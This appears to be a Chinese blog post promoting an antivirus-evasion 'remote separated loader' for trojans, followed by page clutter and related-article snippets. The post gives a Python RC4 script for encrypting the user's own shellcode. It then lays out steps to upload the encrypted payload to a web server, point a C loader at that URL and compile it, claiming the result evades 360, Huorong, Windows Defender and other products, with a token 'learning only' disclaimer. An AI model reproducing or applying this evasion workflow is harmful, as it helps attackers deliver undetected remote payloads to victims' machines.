【护网必备】木马免杀之远程分离加载器

最新推荐文章于 2024-07-18 17:50:20 发布
最新推荐文章于 2024-07-18 17:50:20 发布
阅读量507 收藏 1
点赞数 20
文章标签: 护网工具 免杀工具 渗透测试 信息安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/139806143
版权

项目介绍

此项目是一个简单的远程分离的加载器,免杀国内大部分杀软(360、火绒、Windows Defender、金山毒霸、电脑管家)

项目使用

Step 1:修改Encryption/payload_c_x64.py的24行,改为自己的shellcode


def rc4_encrypt(data, key):
    S = list(range(256))
    j = 0

    # Key-scheduling algorithm (KSA)
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]

    # Pseudo-random generation algorithm (PRGA) & encryption
    i = j = 0
    result = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        k = S[(S[i] + S[j]) % 256]
        result.append(byte ^ k)

    return result

def main():
    # 原始的payload(cale.exe)
    payload = b"你的shellcode"
    # 加密密钥
    key = b"thisIsA16ByteKey"  # 16字节密钥

    # 使用RC4算法加密payload
    encrypted_payload = rc4_encrypt(payload, key)

    # 将加密的payload写入文件
    with open("result.txt", "wb") as file:
        file.write(encrypted_payload)

    print("加密后的payload已写入result.txt")

if __name__ == "__main__":
    main()

Step 2:运行python脚本(环境python3.6)

Step 3:将生成的result.txt上传到Web端(OSS、跳板等机器)

Step 3:copy自己的地址,例如:http://example.org,随后将http://example.org替换ShellCodeLoader/Source.c 的152行,生成64位发行版即可

查杀测试

360查杀:

window defender查杀:

金山火绒查杀:

免责声明

项目仅供进行学习研究,切勿用于任何非法未授权的活动,如个人使用违反安全相关法律,后果与本人无关。

下载地址

点击下方名片进入公众号

回复关键字【240620】获取下载链接

FLy_鹏程万里
关注
  • 20
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
最简单的加载免杀思路
ordar123的博客
04-28 5404
本文首发于先知社区:https://xz.aliyun.com/t/9385 最简单的加载免杀思路 将加载的变量每次生成都要随机也就是变量混淆, 同时在每行之间插入无效指令:比如随机打印,循环打印,随机数计算加减乘除 这个思路的主要作用是加载伪装。不管shellcode如果变化加密解密,最后都要回到这个模板里面加载。就算是采用分离免杀的方法,shellcode本身不会被杀,但是这个加载会被杀,所以经过这样伪装之后加载可以存活,为后面各种花里胡哨的的免杀奠定基础。 source.py是模板
2019年护网行动蓝队必备防御手册(
08-07
2019年护网行动蓝队必备防御手册
2019年护网行动必备防御手册(V1).pdf
08-16
最新2019年护网行动蓝队必备防御手册(V1)
护网行动之常见厂商设备默认账号密码.pdf
04-29
2020年护网行动常用默认账号密码总结,以上资源均来源于网络。
通信与网络中的安全生活隐形防护网—入侵探测
10-23
探测的性能稳定与否将直接关系到整个防盗报警系统能否正常的运行。在多年的研究和发展过程中,误报、漏报、干扰等问题一直是防盗报警系统行业需要攻克的技术难题。所以降低这些问题发生的几率就成为了厂家技术创新...
最新免杀360
12-17
在IT安全领域,"免杀"一词通常指的是绕过反病毒软件检测的技术。这里的"最新免杀360"是指开发出的针对360安全卫士(一款流行的中国网络安全软件)的新型免杀技术,尤其是针对其云查杀功能。360云查杀是360安全卫士的...
【网络安全】资产记录工具 Hacker Asset Logger 安装使用详细教程
等风来
07-15 168
在对某一应用程序的多个页面、对多个相关联的应用程序进行渗透测试的过程中,多个请求包的参数、功能之间可能存在一定的联系。例如,在A页面触发的请求包中,通过UID可获取CustomerID;在B页面触发的请求包中,CustomerID用于Cookie身份鉴定、获取用户敏感信息、获取用户订单号OrderNo;在C页面触发的请求包中,OrderNo用于获取对应用户的敏感信息,如姓名、电话、地址、身份证。
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 1066
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
网络安全-网络安全及其防护措施1
LS_Ai的博客
07-14 1025
网络安全是指保护网络系统及其数据免受未经授权的访问、使用、修改或破坏的过程。它包括对硬件、软件、数据和通信的全面保护,确保系统的机密性、完整性和可用性。网络安全涉及一系列的策略、技术和流程,用于保护网络和数据免受攻击、损失或未经授权的访问。机密性:确保信息只被授权人员访问和查看。完整性:保证信息的准确和完整,防止未经授权的修改。可用性:确保系统和数据在需要时可被合法用户访问。
网络安全-网络安全及其防护措施3
LS_Ai的博客
07-15 678
虚拟专用网络(VPN)是一种通过公用网络(如互联网)建立安全、加密连接的方法,使用户能够安全地访问内部网络资源。数据保密性:通过加密确保数据在传输过程中不被窃听。数据完整性:防止数据在传输过程中被篡改。远程访问:允许远程用户安全访问公司内部网络资源。隐私保护:隐藏用户的真实IP地址,保护隐私。绕过地理限制:访问受地理位置限制的内容。网络访问控制(NAC)是一种网络安全解决方案,用于管理和控制设备和用户对网络资源的访问权限。
黑客自学手册(网络安全
dexi1113的博客
07-18 702
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!
网络安全相关竞赛比赛
最新发布
黑战士的博客
07-18 423
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
网络安全 DVWA通关指南 DVWA Brute Force (爆破)
YueXuan_521的博客
07-15 782
网络安全 DVWA通关指南 DVWA Brute Force ( DVWA Brute Force (爆破) 文章目录 DVWA Brute Force (爆破) Low Medium High Impossible遍历,只是一个选字典1,一个选字典2(相当于50m赛跑同时出发,只是赛道不同,互不干扰。2、密码验证方面,增加验证失败睡眠两秒的限制,这会加大爆破所需要的时间。但只要时间充足,爆破出密码不是问题。使用字典进行爆破,字典可以自己制作,也可以网上直接下载,等待片刻爆破完成,使用爆破出的密码就能登录。
网络安全-等级保护制度介绍
weixin_56233402的博客
07-18 329
以等级保护为标准开展安全建设,可以让单位自身安全建设更加体系化,可以从物理、网络、主机、应用、数据多个方面成体系进行安全建设,再也不会头疼医脚脚痛医头,对本单位的安全建设有了整体的规划和思路。责任更清晰,完成等保测评意味着公安机关认可你的安全现状,一旦发生安全事件是意外,如果没有进行等级保护测评意味着你没有达到国家要求,用户单位承担主要责任,网监部门会直接进行比较严厉的处罚。《信息系统安全保护等级定级指南》GB/T 22240-2008。《基本要求》《定级指南》《实施指南》《测评标准》
企业安全性的新前沿:智能合约在网络安全中的角色
weixin_44672358的博客
07-15 698
智能合约是一种以代码形式存在的自动化合约,运行在区块链上。它们通过预先编程的规则和条件执行,并在满足特定条件时自动执行相关操作。智能合约可以实现自动化、透明和不可篡改的交易和协议,因此被广泛应用于金融、供应链管理和物联网等领域。智能合约作为区块链技术的一项创新应用,为企业安全性带来了新的前沿和解决方案。它不仅提升了传统安全措施的效率和效果,还为企业在面对复杂和多变的网络安全威胁时提供了全新的应对方式。随着技术的进一步发展和普及,智能合约有望在企业安全性保护中发挥越来越重要的角色。
【网络文明】关注网络安全
Liang_z_的博客
07-13 997
网络安全是指保护网络系统的硬件、软件及其存储、传输的数据不被非法访问、篡改、泄露或破坏的过程。这包括了保护个人电脑、智能手机、服务、网络基础设施等设备的安全,确保电子通信的私密性、完整性和可用性。网络安全是一项系统工程,涉及政府、企业、社会组织和每个个体。在享受互联网带来的便利的同时,我们每个人都应承担起维护网安全的责任。通过持续的学习、实践和合作,构建一个更加安全、可信的网络环境,让科技真正造福人类社会。程序员作为数字时代的建设者,我们的每一行代码都承载着责任与使命。
自学黑客(网络安全
热门推荐
xv7676的博客
07-13 2万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
第四届网络安全、人工智能与数字经济国际学术会议(CSAIDE 2025)
qq_57563030的博客
07-18 368
第三届网络安全、人工智能与数字经济国际学术会议(CSAIDE 2025)将于2025年3月7日至9日在扬州举行。
网络安全等级保护制度是如何分级的?
gmqqcsdn的博客
07-18 507
网络安全等级保护制度是中国网络安全法的重要组成部分,它通过对信息系统进行安全等级划分,要求各等级系统采取相应的安全保护措施,以防范和减少网络安全事件的发生。等保制度的实施,标志着中国网络安全管理迈入了标准化、法制化的新时代。该制度根据网络在国家安全、经济建设、社会生活中的重要程度,以及网络一旦遭受破坏、丧失功能或数据被篡改、泄露、丢失、损毁后对国家安全、社会秩序、公共利益以及相关公民、法人和其他组织的合法权益的危害程度等因素,将网络分为五个安全保护等级。第一级。
2019护网行动防御指南:技术与管理并重
"2019年护网行动必备防御手册(V1)是一份由北京赛克艾威科技有限公司发布的专为2019年护网行动蓝队设计的技术与管理层面防御指南。这份手册旨在帮助组织更好地理解和应对网络安全威胁,确保在对抗黑客攻击时能够采取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值